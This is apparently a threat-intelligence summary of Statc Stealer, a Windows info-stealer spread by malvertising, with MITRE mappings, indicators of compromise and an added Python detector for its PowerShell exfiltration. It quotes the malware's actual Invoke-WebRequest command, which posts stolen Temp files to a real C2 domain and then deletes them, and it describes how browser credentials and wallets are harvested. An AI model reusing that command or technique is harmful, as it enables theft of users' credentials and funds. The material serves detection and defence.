Statc Stealer: Decoding the Elusive Malware Threat

Zscaler ThreatLabz analyzed Statc Stealer, an info-stealer distributed via malvertising that uses a dropper, downloader, and PowerShell to install a C++-based stealer on Windows systems. It harvests browser data and numerous crypto wallet types, encrypts the results, and exfiltrates them to C2 infrastructure such as topgearmemory[.]com. #StatcStealer #Zscaler

Key points

  • Distribution: Statc is delivered via malvertising (drive-by) that tricks users into downloading a malicious installer.
  • Initial components: The initial dropper deploys a decoy PDF installer and a downloader binary that runs a PowerShell script to fetch the Statc payload.
  • Evasion: The binary checks its filename against a hardcoded encrypted name and aborts execution if mismatched to hinder sandboxing and reverse engineering.
  • Data collection: Targets major Windows browsers and many browser-based cryptocurrency wallets, harvesting cookies, login data, autofill items, and messaging app data (e.g., Telegram).
  • Local handling: Stolen data is encrypted, written to text files in the Temp folder, and then transmitted to C2 via HTTPS requests.
  • Exfiltration: Uses Invoke-WebRequest PowerShell calls to POST encrypted Temp files to C2 endpoints (topgearmemory[.]com).
  • IOCs: Includes MD5 hashes for dropper/downloader/payload, malicious URLs/IP (95[.]217[.]5[.]87, check[.]topgearmemory[.]com), and filenames like Version2023-new.exe.

MITRE Techniques

  • [T1547] Boot or Logon Autostart Execution – Mapped by Zscaler as a persistence technique observed in analysis (‘T1547 Boot or Logon Autostart Execution’)
  • [T1217] Browser Information Discovery – Statc enumerates and targets browser-stored data for theft (‘Browser exfiltration is the unauthorized transfer of any data from a browser.’)
  • [T1059] Command and Scripting Interpreter – Uses PowerShell to download and post stolen data, e.g., Invoke-WebRequest usage (‘Invoke-WebRequest -Uri https[:]//topgearmemory[.]com/kdsfedafa/stat?c= -Method POST -InFile C:\Users\<username>\AppData\Local\Temp\41075.txt -UseDefaultCredentials -UseBasicParsing ; Remove-Item C:\Users\<username>\AppData\Local\Temp\41075.txt’)
  • [T1555] Credentials from Password Stores – Extracts credentials and autofill data from browser stores and wallets (‘Statc Stealer is able to take sensitive information from various browsers and wallets, and then store the data in a text file inside a Temp folder.’)
  • [T1132] Data Encoding – Encrypts stolen data and uses HTTPS to hide exfiltration to C2 (‘Statc Stealer uses HTTPS protocol to send stolen, encrypted data to the command-and-control (C&C) server.’)
  • [T1005] Data from Local System – Writes harvested artifacts to local Temp files prior to exfiltration (‘stores the data in a text file inside a Temp folder’ / ‘saves stolen data into text files and stores them in the Temp folder.’)
  • [T1001] Data Obfuscation – Uses encrypted strings and encoded payloads; analysts had to decrypt strings via a Python script (‘Using the python script we mentioned above, we decrypted Statc Stealer’s encrypted strings.’)
  • [T1189] Drive-by Compromise – Delivered through malicious/advertisement links in Chrome that initiate the download/execution chain (‘the attack chain begins with an innocuous-looking advertisement within the victim’s Google Chrome browser.’)

Indicators of Compromise

  • [MD5 Hashes] Samples and their roles – f77dc89afbaab53e5f63626e122db61e (dropper), 3834ec03aee0860dfd781805cac3e649 (downloader), and 3 more hashes.
  • [Domain/IP] Malicious download and C2 – 95[.]217[.]5[.]87 (initial sample URL: 95[.]217[.]5[.]87/Setup64_new0/Version2023-new[.]exe), check[.]topgearmemory[.]com (payload/C2 endpoints: check[.]topgearmemory[.]com/dw/… and topgearmemory[.]com/kdsfedafa/stat?c=).
  • [File names] Observed malicious binaries – Version2023-new.exe, chtgpt_x64.exe (additional names: SearchApplication.exe, sound_adapter.exe).
  • [PowerShell/Temp file] Exfiltration artifacts – Invoke-WebRequest PowerShell command posting C:\Users\<username>\AppData\Local\Temp\41075.txt to C2, and the Temp file path C:\Users\<username>\AppData\Local\Temp\41075.txt.

Statc Stealer is deployed via malvertising that lures users into downloading a seemingly legitimate installer. The initial dropper places a decoy PDF installer and a downloader binary; the downloader invokes a PowerShell command to fetch the final Statc payload from domains such as check[.]topgearmemory[.]com or an IP-hosted executable (95[.]217[.]5[.]87/Setup64_new0/Version2023-new[.]exe).

Once executed, the payload (a Win32 PE written in C++) performs filename integrity checks against a hardcoded encrypted name to detect tampering or sandboxing, aborting if mismatched. The stealer enumerates and collects browser artifacts (cookies, Web Data, Local State, autofill, login data), messaging app files (e.g., Telegram), FTP data (FileZilla), and numerous browser wallet files, then encrypts the harvested output and writes it to Temp as text files.

For exfiltration, Statc uses PowerShell Invoke-WebRequest to POST the encrypted Temp file to its C2 over HTTPS (e.g., topgearmemory[.]com/kdsfedafa/stat?c=), then removes local traces. Notable IOCs include MD5 hashes (e.g., f77dc89afbaab53e5f63626e122db61e, 3834ec03aee0860dfd781805cac3e649), malicious URLs/IPs (95[.]217[.]5[.]87 and check[.]topgearmemory[.]com), and filenames like Version2023-new.exe; defenders should monitor for the PowerShell Invoke-WebRequest patterns, Temp file creation, and the listed hashes/domains.
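Detection logic for the exfiltration pattern described above, added here as an example and not part of the Zscaler analysis. It scores PowerShell command lines (as recorded by Sysmon Event ID 1 or Windows 4688 auditing) against the report's Invoke-WebRequest POST / Temp file / Remove-Item sequence and its C2 domains; the sample command lines, usernames and the alert threshold are constructed.

```python
import re
from urllib.parse import urlparse

# Defanged domains from the report, refanged for matching against live telemetry.
IOC_DOMAINS = {d.replace("[.]", ".") for d in ("topgearmemory[.]com", "check[.]topgearmemory[.]com")}

# Staging location used by Statc: a .txt file directly under %LOCALAPPDATA%\Temp.
TEMP_TXT = re.compile(r"\\AppData\\Local\\Temp\\[^\\\s]+\.txt$", re.I)


def host_in_iocs(uri: str) -> bool:
    """True if the URI's host is a listed C2 domain or a subdomain of one."""
    host = (urlparse(uri).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def analyze_cmdline(cmd: str):
    """Score one PowerShell command line; returns (score, reasons).
    Each matched trait adds one point; a score of 3 or more is treated as an alert."""
    reasons = []
    if not re.search(r"\b(Invoke-WebRequest|iwr)\b", cmd, re.I):
        return 0, reasons
    infile = re.search(r"-InFile\s+(\S+)", cmd, re.I)
    uri = re.search(r"-Uri\s+(\S+)", cmd, re.I)
    removed = re.search(r"Remove-Item\s+(\S+)", cmd, re.I)
    if re.search(r"-Method\s+POST\b", cmd, re.I) and infile:
        reasons.append("post_with_infile")      # uploading a local file, not downloading
    if infile and TEMP_TXT.search(infile.group(1)):
        reasons.append("infile_in_temp_txt")    # the report's Temp staging path
    if infile and removed and removed.group(1).lower() == infile.group(1).lower():
        reasons.append("self_cleanup")          # same file deleted right after the POST
    if uri and host_in_iocs(uri.group(1)):
        reasons.append("ioc_domain")            # known C2 domain from the report
    return len(reasons), reasons


def scan(cmdlines, threshold=3):
    """Return (cmdline, score, reasons) for every command line at or above threshold."""
    hits = []
    for cmd in cmdlines:
        score, reasons = analyze_cmdline(cmd)
        if score >= threshold:
            hits.append((cmd, score, reasons))
    return hits


# Constructed sample telemetry: one Statc-style exfiltration and two benign downloads/uploads.
SAMPLE_CMDLINES = [
    r"powershell.exe Invoke-WebRequest -Uri https://topgearmemory.com/kdsfedafa/stat?c= -Method POST "
    r"-InFile C:\Users\alice\AppData\Local\Temp\41075.txt -UseDefaultCredentials -UseBasicParsing ; "
    r"Remove-Item C:\Users\alice\AppData\Local\Temp\41075.txt",
    r"powershell.exe Invoke-WebRequest -Uri https://example.org/tool.zip -OutFile C:\Temp\tool.zip",
    r"powershell.exe Invoke-WebRequest -Uri https://intranet.corp/api -Method POST -InFile C:\Users\bob\reports\q3.json",
]

if __name__ == "__main__":
    for cmd, score, reasons in scan(SAMPLE_CMDLINES):
        print(f"ALERT score={score} reasons={reasons}\n  {cmd}")
```

The Temp path and domain checks are brittle on their own; the combination of a POST with -InFile followed by Remove-Item on the same file is the part worth keeping even after the infrastructure changes.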

Read more: https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat